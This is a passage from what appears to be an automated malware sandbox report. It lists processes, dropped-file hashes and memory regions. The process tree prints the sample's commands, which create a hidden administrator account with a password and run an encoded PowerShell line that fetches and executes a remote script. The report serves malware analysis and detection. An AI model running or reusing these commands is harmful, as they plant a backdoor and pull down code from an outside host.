- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc AwpZwkyN1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc AwpZwkyN2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc AwpZwkyN3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\72DA.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\72DA.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RES8BA2.tmpMD5
1e950a636adb13a1d1092ca915beec5e
SHA128986057998c038dbcd153876e2de5a1bfbe6145
SHA25655417c09b31e2314aa5939118235269a5197d8808c92cc675b71fe1be2a124eb
SHA51240b3d57268a2a183854e22896985b699b9653328ab4ac165ab687f8465afc1419bb2291fd441d21c3802c89202a86a4ac41794de0c465b0a508efd70d75bf2e6
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\lddmhxjh\lddmhxjh.dllMD5
c5d25f19d82d332ab803560d68b3437a
SHA132522eca8084c9d0029fbba2aa074c0706122261
SHA256cbc94c45f14a62da7094c5dc59c4bb32a8b7d6da128f1bbc700a294fcd179259
SHA5129507682818f21aaed1a9ad27fd44f7fced2c31291ac9189f390ea457af04e259d6a105ad3066e9974628b58583c090c88e3c230ea12181369ae6bdee85eff41e
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\lddmhxjh\CSC9E2A9D0A82214121ABF59FA852F7FDB4.TMPMD5
7a98ed942429b217ad65678f3410197c
SHA1ac9f7257c96992dcd241d95042b13e720e226c95
SHA25630d06168ae3b5d22880647b3c3242434a6f05b8b50bec75088988eab897922d0
SHA5125ac3d644c1d995695f4a64e8f56a782fb2bc23510a3f03093d94d642c1d1c640a752ca9e7e328694da8cdd2c813b7bc0f5d8b734698564d1ee24e84b68eb1014
-
\??\c:\Users\Admin\AppData\Local\Temp\lddmhxjh\lddmhxjh.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\lddmhxjh\lddmhxjh.cmdlineMD5
6b57a26851e5ebd359bcfa6324ab9575
SHA1e356770c02c3d61448423d7184a1bee2eed9ff0b
SHA256027a36038f9eec8f4bef3549f34ee87881bd11ce45afaa094303635db0993388
SHA5126dce84019d88269925eb051654afc01e51f7966413c62f5a12434b0467a83c06c7c56c1e3a9f86e4e49bacc6c75d91997a4bcb6f7dd99f93e6a2441e603187a2
-
\Windows\Branding\mediasrv.pngMD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.pngMD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/656-354-0x0000000000000000-mapping.dmp
-
memory/716-141-0x000001ECEE1E0000-0x000001ECEE1E2000-memory.dmpFilesize
8KB
-
memory/716-161-0x000001ECEE1E0000-0x000001ECEE1E2000-memory.dmpFilesize
8KB
-
memory/716-131-0x000001ECEE1E0000-0x000001ECEE1E2000-memory.dmpFilesize
8KB
-
memory/716-132-0x000001ECEE1E0000-0x000001ECEE1E2000-memory.dmpFilesize
8KB
-
memory/716-133-0x000001ECEE910000-0x000001ECEE911000-memory.dmpFilesize
4KB
-
memory/716-134-0x000001ECEE1E0000-0x000001ECEE1E2000-memory.dmpFilesize
8KB
-
memory/716-135-0x000001ECEE1E0000-0x000001ECEE1E2000-memory.dmpFilesize
8KB
-
memory/716-136-0x000001ECEE1E0000-0x000001ECEE1E2000-memory.dmpFilesize
8KB
-
memory/716-137-0x000001ECEF490000-0x000001ECEF491000-memory.dmpFilesize
4KB
-
memory/716-138-0x000001ECEE960000-0x000001ECEE962000-memory.dmpFilesize
8KB
-
memory/716-139-0x000001ECEE963000-0x000001ECEE965000-memory.dmpFilesize
8KB
-
memory/716-129-0x000001ECEE1E0000-0x000001ECEE1E2000-memory.dmpFilesize
8KB
-
memory/716-163-0x000001ECEE1E0000-0x000001ECEE1E2000-memory.dmpFilesize
8KB
-
memory/716-162-0x000001ECEE968000-0x000001ECEE969000-memory.dmpFilesize
4KB
-
memory/716-128-0x0000000000000000-mapping.dmp
-
memory/716-147-0x000001ECEE966000-0x000001ECEE968000-memory.dmpFilesize
8KB
-
memory/716-130-0x000001ECEE1E0000-0x000001ECEE1E2000-memory.dmpFilesize
8KB
-
memory/716-160-0x000001ECEFE00000-0x000001ECEFE01000-memory.dmpFilesize
4KB
-
memory/716-159-0x000001ECEFA70000-0x000001ECEFA71000-memory.dmpFilesize
4KB
-
memory/716-153-0x000001ECEE990000-0x000001ECEE991000-memory.dmpFilesize
4KB
-
memory/952-391-0x000002827BEB0000-0x000002827BEB2000-memory.dmpFilesize
8KB
-
memory/952-362-0x0000000000000000-mapping.dmp
-
memory/952-392-0x000002827BEB3000-0x000002827BEB5000-memory.dmpFilesize
8KB
-
memory/952-407-0x000002827BEB8000-0x000002827BEB9000-memory.dmpFilesize
4KB
-
memory/952-377-0x0000000000000000-mapping.dmp
-
memory/952-393-0x000002827BEB6000-0x000002827BEB8000-memory.dmpFilesize
8KB
-
memory/1084-376-0x0000000000000000-mapping.dmp
-
memory/1252-145-0x0000000000000000-mapping.dmp
-
memory/1404-355-0x0000000000000000-mapping.dmp
-
memory/1444-367-0x0000000000000000-mapping.dmp
-
memory/1536-364-0x0000000000000000-mapping.dmp
-
memory/1648-252-0x0000000000000000-mapping.dmp
-
memory/1648-292-0x00000240A4926000-0x00000240A4928000-memory.dmpFilesize
8KB
-
memory/1648-293-0x00000240A4928000-0x00000240A492A000-memory.dmpFilesize
8KB
-
memory/1648-291-0x00000240A4923000-0x00000240A4925000-memory.dmpFilesize
8KB
-
memory/1648-290-0x00000240A4920000-0x00000240A4922000-memory.dmpFilesize
8KB
-
memory/1688-179-0x0000022F7C510000-0x0000022F7C512000-memory.dmpFilesize
8KB
-
memory/1688-175-0x0000022F63D50000-0x0000022F63D52000-memory.dmpFilesize
8KB
-
memory/1688-181-0x0000022F63D50000-0x0000022F63D52000-memory.dmpFilesize
8KB
-
memory/1688-203-0x0000022F7C516000-0x0000022F7C518000-memory.dmpFilesize
8KB
-
memory/1688-169-0x0000000000000000-mapping.dmp
-
memory/1688-171-0x0000022F63D50000-0x0000022F63D52000-memory.dmpFilesize
8KB
-
memory/1688-180-0x0000022F7C513000-0x0000022F7C515000-memory.dmpFilesize
8KB
-
memory/1688-170-0x0000022F63D50000-0x0000022F63D52000-memory.dmpFilesize
8KB
-
memory/1688-172-0x0000022F63D50000-0x0000022F63D52000-memory.dmpFilesize
8KB
-
memory/1688-173-0x0000022F63D50000-0x0000022F63D52000-memory.dmpFilesize
8KB
-
memory/1688-177-0x0000022F63D50000-0x0000022F63D52000-memory.dmpFilesize
8KB
-
memory/1688-176-0x0000022F63D50000-0x0000022F63D52000-memory.dmpFilesize
8KB
-
memory/1828-125-0x00000203E4993000-0x00000203E4995000-memory.dmpFilesize
8KB
-
memory/1828-126-0x00000203E4995000-0x00000203E4996000-memory.dmpFilesize
4KB
-
memory/1828-119-0x0000000000000000-mapping.dmp
-
memory/1828-122-0x00000203FD5C0000-0x00000203FD9BF000-memory.dmpFilesize
4.0MB
-
memory/1828-127-0x00000203E4996000-0x00000203E4997000-memory.dmpFilesize
4KB
-
memory/1828-124-0x00000203E4990000-0x00000203E4992000-memory.dmpFilesize
8KB
-
memory/1960-368-0x0000000000000000-mapping.dmp
-
memory/1992-371-0x0000000000000000-mapping.dmp
-
memory/2000-372-0x0000000000000000-mapping.dmp
-
memory/2136-149-0x0000000000000000-mapping.dmp
-
memory/2196-358-0x0000000000000000-mapping.dmp
-
memory/2220-356-0x0000000000000000-mapping.dmp
-
memory/2324-353-0x0000000000000000-mapping.dmp
-
memory/2392-363-0x0000000000000000-mapping.dmp
-
memory/2516-366-0x0000000000000000-mapping.dmp
-
memory/2568-375-0x0000000000000000-mapping.dmp
-
memory/3036-118-0x0000000000590000-0x00000000005A6000-memory.dmpFilesize
88KB
-
memory/3096-445-0x0000000000000000-mapping.dmp
-
memory/3144-352-0x0000000000000000-mapping.dmp
-
memory/3232-357-0x0000000000000000-mapping.dmp
-
memory/3272-309-0x0000000000000000-mapping.dmp
-
memory/3460-311-0x0000000000000000-mapping.dmp
-
memory/3628-365-0x0000000000000000-mapping.dmp
-
memory/3628-212-0x0000000000000000-mapping.dmp
-
memory/3628-244-0x0000023CE0060000-0x0000023CE0062000-memory.dmpFilesize
8KB
-
memory/3628-245-0x0000023CE0063000-0x0000023CE0065000-memory.dmpFilesize
8KB
-
memory/3628-247-0x0000023CE0068000-0x0000023CE006A000-memory.dmpFilesize
8KB
-
memory/3628-249-0x0000023CE0066000-0x0000023CE0068000-memory.dmpFilesize
8KB
-
memory/3664-373-0x0000000000000000-mapping.dmp
-
memory/3800-310-0x0000000000000000-mapping.dmp
-
memory/3800-370-0x0000000000000000-mapping.dmp
-
memory/3860-349-0x0000000000000000-mapping.dmp
-
memory/3876-359-0x0000000000000000-mapping.dmp
-
memory/3912-446-0x0000000000000000-mapping.dmp
-
memory/4020-369-0x0000000000000000-mapping.dmp
-
memory/4076-374-0x0000000000000000-mapping.dmp
-
memory/4088-117-0x0000000000400000-0x0000000002BAF000-memory.dmpFilesize
39.7MB
-
memory/4088-116-0x0000000002BB0000-0x0000000002C5E000-memory.dmpFilesize
696KB
-
memory/4092-348-0x0000000000000000-mapping.dmp